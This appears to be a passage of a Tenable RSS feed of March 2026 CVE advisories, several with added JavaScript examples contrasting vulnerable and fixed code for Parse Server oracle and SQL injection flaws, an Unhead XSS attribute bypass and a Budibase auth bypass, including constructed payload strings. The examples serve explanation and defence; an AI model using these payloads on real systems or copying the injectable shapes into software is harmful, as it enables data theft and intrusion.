            <link>https://www.tenable.com/cve/CVE-2026-31894</link>
            <guid>https://www.tenable.com/cve/CVE-2026-31894</guid>
            <pubDate>Wed, 11 Mar 2026 20:16:15 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>WeGIA is a web manager for charitable institutions. In 3.6.5, the patched loadBackupDB() extracts tar.gz archives to a temporary directory using PHP's PharData class, then uses glob() and file_get_contents() to read SQL files from the extracted contents. Neither the extraction nor the file reading validates whether archive members are symbolic links. This vulnerability is fixed in 3.6.6.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-31894">https://www.tenable.com/cve/CVE-2026-31894</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-31890]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-31890</link>
            <guid>https://www.tenable.com/cve/CVE-2026-31890</guid>
            <pubDate>Thu, 12 Mar 2026 18:16:24 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Inspektor Gadget is a set of tools and framework for data collection and system inspection on Kubernetes clusters and Linux hosts using eBPF. Prior to 0.50.1, in a situation where the ring-buffer of a gadget is – incidentally or maliciously – already full, the gadget will silently drop events. The include/gadget/buffer.h file contains definitions for the Buffer API that gadgets can use to, among other things, transfer data from eBPF programs to userspace. For hosts running a modern enough Linux kernel (>= 5.8), this transfer mechanism is based on ring-buffers. The size of the ring-buffer for the gadgets is hard-coded to 256KB. When a gadget_reserve_buf fails because of insufficient space, the gadget silently cleans up without producing an alert. The lost count reported by the eBPF operator, when using ring-buffers – the modern choice – is hardcoded to zero. The vulnerability can be used by a malicious event source (e.g. a compromised container) to cause a Denial Of Service, forcing the system to drop events coming from other containers (or the same container). This vulnerability is fixed in 0.50.1.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-31890">https://www.tenable.com/cve/CVE-2026-31890</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-31886]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-31886</link>
            <guid>https://www.tenable.com/cve/CVE-2026-31886</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:37 GMT</pubDate>
            <description><![CDATA[
      <p>Critical Severity</p>

      <h3>Description</h3>
      <p>Dagu is a workflow engine with a built-in Web user interface. Prior to 2.2.4, the dagRunId request field accepted by the inline DAG execution endpoints is passed directly into filepath.Join to construct a temporary directory path without any format validation. Go's filepath.Join resolves .. segments lexically, so a caller can supply a value such as ".." to redirect the computed directory outside the intended /tmp/<name>/<id> path. A deferred cleanup function that calls os.RemoveAll on that directory then runs unconditionally when the HTTP handler returns, deleting whatever directory the traversal resolved to. With dagRunId set to "..", the resolved directory is the system temporary directory (/tmp on Linux). On non-root deployments, os.RemoveAll("/tmp") removes all files in /tmp owned by the dagu process user, disrupting every concurrent dagu run that has live temp files. On root or Docker deployments, the call removes the entire contents of /tmp, causing a system-wide denial of service. This vulnerability is fixed in 2.2.4.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-31886">https://www.tenable.com/cve/CVE-2026-31886</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-31885]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-31885</link>
            <guid>https://www.tenable.com/cve/CVE-2026-31885</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:37 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to 3.24.0, there is an out-of-bounds read in MS-ADPCM and IMA-ADPCM decoders due to unchecked predictor and step_index values from input data. This vulnerability is fixed in 3.24.0.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-31885">https://www.tenable.com/cve/CVE-2026-31885</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-31884]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-31884</link>
            <guid>https://www.tenable.com/cve/CVE-2026-31884</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:37 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to 3.24.0, a division by zero in the MS-ADPCM and IMA-ADPCM decoders when nBlockAlign is 0 leads to a crash. In libfreerdp/codec/dsp.c, both ADPCM decoders use size % block_size where block_size = context->common.format.nBlockAlign. The nBlockAlign value comes from the Server Audio Formats PDU on the RDPSND channel. The value 0 is not validated anywhere before reaching the decoder. When nBlockAlign = 0, the modulo operation causes a SIGFPE (floating point exception) crash. This vulnerability is fixed in 3.24.0.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-31884">https://www.tenable.com/cve/CVE-2026-31884</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-31883]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-31883</link>
            <guid>https://www.tenable.com/cve/CVE-2026-31883</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:37 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to 3.24.0, a size_t underflow in the IMA-ADPCM and MS-ADPCM audio decoders leads to heap-buffer-overflow write via the RDPSND audio channel. In libfreerdp/codec/dsp.c, the IMA-ADPCM and MS-ADPCM decoders subtract block header sizes from a size_t variable without checking for underflow. When nBlockAlign (received from the server) is set such that size % block_size == 0 triggers the header parsing at a point where size is smaller than the header (4 or 8 bytes), the subtraction wraps size to ~SIZE_MAX. The while (size > 0) loop then continues for an astronomical number of iterations. This vulnerability is fixed in 3.24.0.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-31883">https://www.tenable.com/cve/CVE-2026-31883</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-31882]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-31882</link>
            <guid>https://www.tenable.com/cve/CVE-2026-31882</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:37 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Dagu is a workflow engine with a built-in Web user interface. Prior to 2.2.4, when Dagu is configured with HTTP Basic authentication (DAGU_AUTH_MODE=basic), all Server-Sent Events (SSE) endpoints are accessible without any credentials. This allows unauthenticated attackers to access real-time DAG execution data, workflow configurations, execution logs, and queue status — bypassing the authentication that protects the REST API. The buildStreamAuthOptions() function builds authentication options for SSE/streaming endpoints. When the auth mode is basic, it returns an auth.Options struct with BasicAuthEnabled: true but AuthRequired defaults to false (Go zero value). The authentication middleware at internal/service/frontend/auth/middleware.go allows unauthenticated requests when AuthRequired is false. This vulnerability is fixed in 2.2.4.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-31882">https://www.tenable.com/cve/CVE-2026-31882</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-31879]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-31879</link>
            <guid>https://www.tenable.com/cve/CVE-2026-31879</guid>
            <pubDate>Wed, 11 Mar 2026 19:16:04 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Frappe is a full-stack web application framework. Prior to 14.100.2, 15.101.0, and 16.10.0, due to a lack of validation and improper permission checks, users could modify other user's private workspaces. Specially crafted requests could lead to stored XSS here. This vulnerability is fixed in 14.100.2, 15.101.0, and 16.10.0.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-31879">https://www.tenable.com/cve/CVE-2026-31879</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-31878]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-31878</link>
            <guid>https://www.tenable.com/cve/CVE-2026-31878</guid>
            <pubDate>Wed, 11 Mar 2026 19:16:04 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Frappe is a full-stack web application framework. Prior to 14.100.1, 15.100.0, and 16.6.0, a malicious user could send a crafted request to an endpoint which would lead to the server making an HTTP call to a service of the user's choice. This vulnerability is fixed in 14.100.1, 15.100.0, and 16.6.0.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-31878">https://www.tenable.com/cve/CVE-2026-31878</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-31877]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-31877</link>
            <guid>https://www.tenable.com/cve/CVE-2026-31877</guid>
            <pubDate>Wed, 11 Mar 2026 19:16:04 GMT</pubDate>
            <description><![CDATA[
      <p>Critical Severity</p>

      <h3>Description</h3>
      <p>Frappe is a full-stack web application framework. Prior to 15.84.0 and 14.99.0, a specially crafted request made to a certain endpoint could result in SQL injection, allowing an attacker to extract information they wouldn't otherwise be able to. This vulnerability is fixed in 15.84.0 and 14.99.0.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-31877">https://www.tenable.com/cve/CVE-2026-31877</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-31875]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-31875</link>
            <guid>https://www.tenable.com/cve/CVE-2026-31875</guid>
            <pubDate>Wed, 11 Mar 2026 18:16:27 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Parse Server is an open source backend that can be deployed to any infrastructure that can run Node.js. Prior to 9.6.0-alpha.7 and 8.6.33, when multi-factor authentication (MFA) via TOTP is enabled for a user account, Parse Server generates two single-use recovery codes. These codes are intended as a fallback when the user cannot provide a TOTP token. However, recovery codes are not consumed after use, allowing the same recovery code to be used an unlimited number of times. This defeats the single-use design of recovery codes and weakens the security of MFA-protected accounts. An attacker who obtains a single recovery code can repeatedly authenticate as the affected user without the code ever being invalidated. This vulnerability is fixed in 9.6.0-alpha.7 and 8.6.33.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-31875">https://www.tenable.com/cve/CVE-2026-31875</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-31872]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-31872</link>
            <guid>https://www.tenable.com/cve/CVE-2026-31872</guid>
            <pubDate>Wed, 11 Mar 2026 18:16:26 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Parse Server is an open source backend that can be deployed to any infrastructure that can run Node.js. Prior to 9.6.0-alpha.6 and 8.6.32, the protectedFields class-level permission (CLP) can be bypassed using dot-notation in query WHERE clauses and sort parameters. An attacker can use dot-notation to query or sort by sub-fields of a protected field, enabling a binary oracle attack to enumerate protected field values. This affects both MongoDB and PostgreSQL deployments. This vulnerability is fixed in 9.6.0-alpha.6 and 8.6.32.</p>
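      <p>An added example, not Parse Server code, showing the oracle in miniature: an in-memory class strips a protected field from results but, in the bypassable shape, still honours it as a where key, so a prefix regex on a dotted sub-key recovers the hidden value one character per round. The guarded variant rejects any where or sort key whose root segment is protected. The data, field names and matcher are constructed for the illustration.</p>

```javascript
// Added example, not Parse Server code: an in-memory model of a class whose
// `profile` field is a protected field for the querying role. Data and
// field names are constructed.
const OBJECTS = [
  { objectId: 'u1', username: 'alice', profile: { ssn: '123-45-6789' } },
  { objectId: 'u2', username: 'bob', profile: { ssn: '987-65-4321' } },
];
const PROTECTED_FIELDS = ['profile'];

function valueAt(obj, dottedKey) {
  return dottedKey.split('.').reduce((o, k) => (o == null ? undefined : o[k]), obj);
}

// Minimal where-matcher: $or, equality, or {$regex} on a possibly dotted key.
function matches(obj, where) {
  return Object.entries(where).every(([key, cond]) => {
    if (key === '$or') return cond.some((sub) => matches(obj, sub));
    const v = valueAt(obj, key);
    if (cond !== null && typeof cond === 'object' && '$regex' in cond) {
      return typeof v === 'string' && new RegExp(cond.$regex).test(v);
    }
    return v === cond;
  });
}

function stripProtected(obj) {
  const out = { ...obj };
  for (const f of PROTECTED_FIELDS) delete out[f];
  return out;
}

// Bypassable shape: protected fields are stripped from the *result*, but
// nothing stops them from being used as a filter or sort key.
function findBypassable(where) {
  return OBJECTS.filter((o) => matches(o, where)).map(stripProtected);
}

// Guarded shape: every key used in `where` (recursing into $or) and in the
// sort string is checked by its root segment against the protected list.
function whereKeys(where, out = []) {
  for (const [k, v] of Object.entries(where)) {
    if (k === '$or') v.forEach((sub) => whereKeys(sub, out));
    else out.push(k);
  }
  return out;
}

function findGuarded(where, order = '') {
  const sortKeys = order.split(',').map((s) => s.trim().replace(/^-/, '')).filter(Boolean);
  for (const key of whereKeys(where).concat(sortKeys)) {
    if (PROTECTED_FIELDS.includes(key.split('.')[0])) {
      throw new Error(`cannot query or sort on protected field "${key}"`);
    }
  }
  return findBypassable(where);
}

// The oracle: a prefix regex on the dotted key answers "does a row match",
// which recovers the hidden value one character per round.
function escapeRegex(s) {
  return s.replace(/[.*+?^${}()|[\]\\]/g, '\\$&');
}

function leakThroughOracle(anchorWhere, key, alphabet, maxLen, find) {
  let known = '';
  for (let i = 0; i < maxLen; i++) {
    const next = alphabet.find(
      (c) => find({ ...anchorWhere, [key]: { $regex: '^' + escapeRegex(known + c) } }).length > 0,
    );
    if (next === undefined) break;
    known += next;
  }
  return known;
}

console.log(leakThroughOracle({ username: 'alice' }, 'profile.ssn', '0123456789-'.split(''), 11, findBypassable));
// -> 123-45-6789
```

      <p>The guard has to see every place a field name can enter a query: where (including inside $or, $and and $nor), order, distinct and aggregation stages. Checking the root segment of a dotted key is what closes the sub-field route; checking only exact field names is how the bypass arises.</p>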

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-31872">https://www.tenable.com/cve/CVE-2026-31872</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-31871]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-31871</link>
            <guid>https://www.tenable.com/cve/CVE-2026-31871</guid>
            <pubDate>Wed, 11 Mar 2026 18:16:26 GMT</pubDate>
            <description><![CDATA[
      <p>Critical Severity</p>

      <h3>Description</h3>
      <p>Parse Server is an open source backend that can be deployed to any infrastructure that can run Node.js. Prior to 9.6.0-alpha.5 and 8.6.31, a SQL injection vulnerability exists in the PostgreSQL storage adapter when processing Increment operations on nested object fields using dot notation (e.g., stats.counter). The sub-key name is interpolated directly into SQL string literals without escaping. An attacker who can send write requests to the Parse Server REST API can inject arbitrary SQL via a crafted sub-key name containing single quotes, potentially executing commands or reading data from the database, bypassing CLPs and ACLs. Only Postgres deployments are affected. This vulnerability is fixed in 9.6.0-alpha.5 and 8.6.31.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-31871">https://www.tenable.com/cve/CVE-2026-31871</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-31868]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-31868</link>
            <guid>https://www.tenable.com/cve/CVE-2026-31868</guid>
            <pubDate>Wed, 11 Mar 2026 18:16:25 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Parse Server is an open source backend that can be deployed to any infrastructure that can run Node.js. Prior to 9.6.0-alpha.4 and 8.6.30, an attacker can upload a file with a file extension or content type that is not blocked by the default configuration of the Parse Server fileUpload.fileExtensions option. The file can contain malicious code, for example JavaScript in an SVG or XHTML file. When the file is accessed via its URL, the browser renders the file and executes the malicious code in the context of the Parse Server domain. This is a stored Cross-Site Scripting (XSS) vulnerability that can be exploited to steal session tokens, redirect users, or perform actions on behalf of other users. Affected file extensions and content types include .svgz, .xht, .xml, .xsl, .xslt, and content types application/xhtml+xml and application/xslt+xml for extensionless uploads. Uploading of .html, .htm, .shtml, .xhtml, and .svg files was already blocked. This vulnerability is fixed in 9.6.0-alpha.4 and 8.6.30.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-31868">https://www.tenable.com/cve/CVE-2026-31868</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-31864]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-31864</link>
            <guid>https://www.tenable.com/cve/CVE-2026-31864</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:36 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>JumpServer is an open source bastion host and an operation and maintenance security audit system. A Server-Side Template Injection (SSTI) vulnerability exists in JumpServer's Applet and VirtualApp upload functionality. This vulnerability can only be exploited by users with administrative privileges (Application Applet Management or Virtual Application Management permissions). Attackers can exploit this vulnerability to execute arbitrary code within the JumpServer Core container. The vulnerability arises from unsafe use of Jinja2 template rendering when processing user-uploaded YAML configuration files. When a user uploads an Applet or VirtualApp ZIP package, the manifest.yml file is rendered through Jinja2 without sandbox restrictions, allowing template injection attacks.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-31864">https://www.tenable.com/cve/CVE-2026-31864</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-31860]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-31860</link>
            <guid>https://www.tenable.com/cve/CVE-2026-31860</guid>
            <pubDate>Thu, 12 Mar 2026 18:16:24 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Unhead is a document head and template manager. Prior to 2.1.11, useHeadSafe() can be bypassed to inject arbitrary HTML attributes, including event handlers, into SSR-rendered &lt;head&gt; tags. This is the composable that the Nuxt docs recommend for safely handling user-generated content. The acceptDataAttrs function (safe.ts, lines 16-20) allows any property key starting with data- through to the final HTML. It only checks the prefix, not whether the key contains spaces or other characters that break HTML attribute parsing. This vulnerability is fixed in 2.1.11.</p>
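      <p>An added example, not Unhead's code: a toy server-side tag renderer with the prefix-only acceptor the description mentions beside a stricter one, fed a key that carries an event handler. The attribute-name allowlist is an assumed policy (deliberately narrower than what HTML permits), and the renderer and input are constructed for the illustration.</p>

```javascript
// Added example, not Unhead's code: a toy SSR tag renderer with the
// prefix-only acceptor described above and a stricter one beside it.
function acceptDataAttrPrefixOnly(key) {
  return key.startsWith('data-');
}

// Conservative allowlist for a data-* attribute *name*: no whitespace, quotes,
// '=', '/', '<' or '>' can ever reach the tag. (Assumed policy, stricter than
// what HTML itself permits in an attribute name.)
const DATA_ATTR_NAME = /^data-[A-Za-z0-9][A-Za-z0-9_.:-]*$/;
function acceptDataAttrStrict(key) {
  return DATA_ATTR_NAME.test(key);
}

function escapeAttrValue(v) {
  return String(v).replace(/&/g, '&amp;').replace(/"/g, '&quot;').replace(/</g, '&lt;').replace(/>/g, '&gt;');
}

// Render <meta ...> keeping the documented keys plus whatever the data-*
// acceptor lets through. Values are escaped; the name is emitted as-is,
// which is exactly why the acceptor must vet it.
function renderMetaTag(attrs, acceptDataAttr) {
  const allowed = Object.entries(attrs).filter(([k]) => k === 'name' || k === 'content' || acceptDataAttr(k));
  const body = allowed.map(([k, v]) => `${k}="${escapeAttrValue(v)}"`).join(' ');
  return `<meta ${body}>`;
}

// Constructed user-controlled input: the *key* carries the payload, the
// value is harmless once escaped.
const USER_ATTRS = {
  name: 'description',
  content: '<script>alert(1)</script>',
  'data-x onmouseover=alert(document.cookie) data-y': 'z',
};

console.log(renderMetaTag(USER_ATTRS, acceptDataAttrPrefixOnly));
// -> <meta name="description" content="&lt;script&gt;..." data-x onmouseover=alert(document.cookie) data-y="z">
console.log(renderMetaTag(USER_ATTRS, acceptDataAttrStrict));
// -> <meta name="description" content="&lt;script&gt;alert(1)&lt;/script&gt;">
```

      <p>Escaping the value is necessary but not sufficient: an attribute name is emitted raw by every template engine, so the only defence is to validate it against a closed grammar before it is accepted. A prefix test is a membership check on the wrong set.</p>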

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-31860">https://www.tenable.com/cve/CVE-2026-31860</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-31856]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-31856</link>
            <guid>https://www.tenable.com/cve/CVE-2026-31856</guid>
            <pubDate>Wed, 11 Mar 2026 18:16:24 GMT</pubDate>
            <description><![CDATA[
      <p>Critical Severity</p>

      <h3>Description</h3>
      <p>Parse Server is an open source backend that can be deployed to any infrastructure that can run Node.js. A SQL injection vulnerability exists in the PostgreSQL storage adapter when processing Increment operations on nested object fields using dot notation (e.g., stats.counter). The amount value is interpolated directly into the SQL query without parameterization or type validation. An attacker who can send write requests to the Parse Server REST API can inject arbitrary SQL subqueries to read any data from the database, bypassing CLPs and ACLs. MongoDB deployments are not affected. This vulnerability is fixed in 9.6.0-alpha.3 and 8.6.29.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-31856">https://www.tenable.com/cve/CVE-2026-31856</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-31840]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-31840</link>
            <guid>https://www.tenable.com/cve/CVE-2026-31840</guid>
            <pubDate>Wed, 11 Mar 2026 17:16:58 GMT</pubDate>
            <description><![CDATA[
      <p>Critical Severity</p>

      <h3>Description</h3>
      <p>Parse Server is an open source backend that can be deployed to any infrastructure that can run Node.js. Prior to 9.6.0-alpha.2 and 8.6.28, an attacker can use a dot-notation field name in combination with the sort query parameter to inject SQL into the PostgreSQL database through an improper escaping of sub-field values in dot-notation queries. The vulnerability may also affect queries that use dot-notation field names with the distinct and where query parameters. This vulnerability only affects deployments using a PostgreSQL database. This vulnerability is fixed in 9.6.0-alpha.2 and 8.6.28.</p>
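      <p>An added example covering this entry and the two related PostgreSQL adapter entries above (CVE-2026-31871, the sub-key interpolated into a string literal, and CVE-2026-31856, the increment amount interpolated without type validation). It is modelled on the descriptions, not on Parse Server's actual SQL: a JSONB increment is built first with both values spliced into the statement text, then with the sub-key validated as a plain key name and both values passed as bind parameters. The class and field names and the two payloads are constructed.</p>

```javascript
// Added example, modelled on the descriptions rather than on Parse Server's
// PostgreSQL adapter: the SQL text is illustrative, and the class and field
// names are constructed.
function quoteIdent(name) {
  if (!/^[A-Za-z_][A-Za-z0-9_]*$/.test(name)) throw new Error(`invalid identifier: ${name}`);
  return `"${name}"`;
}

// Injectable shape: sub-key and amount are spliced into the SQL as text.
// A single quote in the sub-key, or anything but a number as the amount,
// becomes SQL.
function buildIncrementInjectable(className, field, subKey, amount) {
  const col = quoteIdent(field);
  return {
    text:
      `UPDATE ${quoteIdent(className)} SET ${col} = jsonb_set(${col}, '{${subKey}}', ` +
      `(COALESCE(${col}->>'${subKey}', '0')::numeric + ${amount})::text::jsonb)`,
    values: [],
  };
}

// Parameterised shape: the sub-key is validated as a plain key name and both
// it and the amount are bind parameters, so neither can alter the statement.
const SUB_KEY_RE = /^[A-Za-z_][A-Za-z0-9_]*$/;

function buildIncrementParameterised(className, field, subKey, amount) {
  if (!SUB_KEY_RE.test(subKey)) throw new Error(`invalid sub-key: ${subKey}`);
  if (typeof amount !== 'number' || !Number.isFinite(amount)) {
    throw new Error('amount must be a finite number');
  }
  const col = quoteIdent(field);
  return {
    text:
      `UPDATE ${quoteIdent(className)} SET ${col} = jsonb_set(${col}, ARRAY[$1]::text[], ` +
      `(COALESCE(${col}->>$1, '0')::numeric + $2)::text::jsonb)`,
    values: [subKey, amount],
  };
}

// Two payloads of the kind the advisories describe, constructed here.
const EVIL_SUBKEY = "counter' || (SELECT string_agg(\"password\", ',') FROM \"_User\") || '";
const EVIL_AMOUNT = '0), "owner" = (SELECT \'attacker\'';

console.log(buildIncrementInjectable('GameScore', 'stats', EVIL_SUBKEY, 1).text);
console.log(buildIncrementInjectable('GameScore', 'stats', 'counter', EVIL_AMOUNT).text);
console.log(buildIncrementParameterised('GameScore', 'stats', 'counter', 1));
```

      <p>Identifiers (class and column names) cannot be bound, so they are allowlisted and quoted; everything that is data (the JSON path element and the amount) is bound. The type check on the amount matters because a JSON body can carry a string where a number is expected, and a string concatenated into SQL is exactly the second advisory.</p>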

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-31840">https://www.tenable.com/cve/CVE-2026-31840</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-31816]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-31816</link>
            <guid>https://www.tenable.com/cve/CVE-2026-31816</guid>
            <pubDate>Mon, 09 Mar 2026 21:16:20 GMT</pubDate>
            <description><![CDATA[
      <p>Critical Severity</p>

      <h3>Description</h3>
      <p>Budibase is a low code platform for creating internal tools, workflows, and admin panels. In 3.31.4 and earlier, the Budibase server's authorized() middleware that protects every server-side API endpoint can be completely bypassed by appending a webhook path pattern to the query string of any request. The isWebhookEndpoint() function uses an unanchored regex that tests against ctx.request.url, which in Koa includes the full URL with query parameters. When the regex matches, the authorized() middleware immediately calls return next(), skipping all authentication, authorization, role checks, and CSRF protection. This means a completely unauthenticated, remote attacker can access any server-side API endpoint by simply appending ?/webhooks/trigger (or any webhook pattern variant) to the URL.</p>
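      <p>An added example, not Budibase's code, of the authorization short-circuit in miniature: the same middleware decision made with an unanchored regex over the full request URL (path plus query string, as Koa's ctx.request.url carries it) and with an anchored test over the parsed path only. The webhook pattern, route shape and request objects are assumptions made for the illustration.</p>

```javascript
// Added example, not Budibase's code: a model of the authorized() check with
// the unanchored full-URL test beside a path-anchored one. The webhook
// pattern and route shape are assumed for illustration. `ctx.request.url`
// is modelled as Koa presents it: path plus query string, no scheme or host.
const WEBHOOK_UNANCHORED = /\/webhooks\/trigger/;
const WEBHOOK_ANCHORED = /^\/api\/webhooks\/trigger(\/|$)/;

function isWebhookEndpointUnanchored(ctx) {
  return WEBHOOK_UNANCHORED.test(ctx.request.url);
}

// Parse the request target and test only the path component, anchored at
// its start, so nothing in the query string or fragment can satisfy the match.
function isWebhookEndpointAnchored(ctx) {
  const { pathname } = new URL(ctx.request.url, 'http://placeholder.invalid');
  return WEBHOOK_ANCHORED.test(pathname);
}

// The middleware in miniature: webhook routes skip authentication; everything
// else needs a valid session. Returns what the request is allowed to do.
function authorized(ctx, isWebhook, hasValidSession) {
  if (isWebhook(ctx)) return 'next:unauthenticated';
  return hasValidSession(ctx) ? 'next:authenticated' : 'deny';
}

const noSession = () => false;
const attackerRequest = { request: { url: '/api/users?/webhooks/trigger' } }; // constructed
const webhookRequest = { request: { url: '/api/webhooks/trigger/app_1/hook_1' } };

console.log(authorized(attackerRequest, isWebhookEndpointUnanchored, noSession)); // next:unauthenticated
console.log(authorized(attackerRequest, isWebhookEndpointAnchored, noSession));   // deny
console.log(authorized(webhookRequest, isWebhookEndpointAnchored, noSession));    // next:unauthenticated
```

      <p>Two properties make the anchored version safe: it looks at the path component only, and the pattern is pinned to the start of that path. Dot-segment tricks such as /api/webhooks/trigger/../users are also neutralised because the URL parser normalises the path before the test. Better still is to let the router decide which handler owns the route and attach the "no auth" behaviour to that handler, rather than re-deriving it from the URL in a middleware.</p>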

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-31816">https://www.tenable.com/cve/CVE-2026-31816</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-31814]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-31814</link>
            <guid>https://www.tenable.com/cve/CVE-2026-31814</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:36 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Yamux is a stream multiplexer over reliable, ordered connections such as TCP/IP. From 0.13.0 to before 0.13.9, a specially crafted WindowUpdate can cause arithmetic overflow in send-window accounting, which triggers a panic in the connection state machine. This is remotely reachable over a normal network connection and does not require authentication. This vulnerability is fixed in 0.13.9.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-31814">https://www.tenable.com/cve/CVE-2026-31814</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-31806]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-31806</link>
            <guid>https://www.tenable.com/cve/CVE-2026-31806</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:36 GMT</pubDate>
            <description><![CDATA[
      <p>Critical Severity</p>

      <h3>Description</h3>
      <p>FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to 3.24.0, the gdi_surface_bits() function processes SURFACE_BITS_COMMAND messages sent by the RDP server. When the command is handled using NSCodec, the bmp.width and bmp.height values provided by the server are not properly validated against the actual desktop dimensions. A malicious RDP server can supply crafted bmp.width and bmp.height values that exceed the expected surface size. Because these values are used during bitmap decoding and memory operations without proper bounds checking, this can lead to a heap buffer overflow. Since the attacker can also control the associated pixel data transmitted by the server, the overflow may be exploitable to overwrite adjacent heap memory. This vulnerability is fixed in 3.24.0.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-31806">https://www.tenable.com/cve/CVE-2026-31806</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-31798]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-31798</link>
            <guid>https://www.tenable.com/cve/CVE-2026-31798</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:36 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>JumpServer is an open source bastion host and an operation and maintenance security audit system. Prior to v4.10.16-lts, JumpServer improperly validates certificates in the Custom SMS API Client. When JumpServer sends MFA/OTP codes via the Custom SMS API, an attacker in a position to intercept the request can capture the verification code before it reaches the user's phone. This vulnerability is fixed in v4.10.16-lts.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-31798">https://www.tenable.com/cve/CVE-2026-31798</a></p>
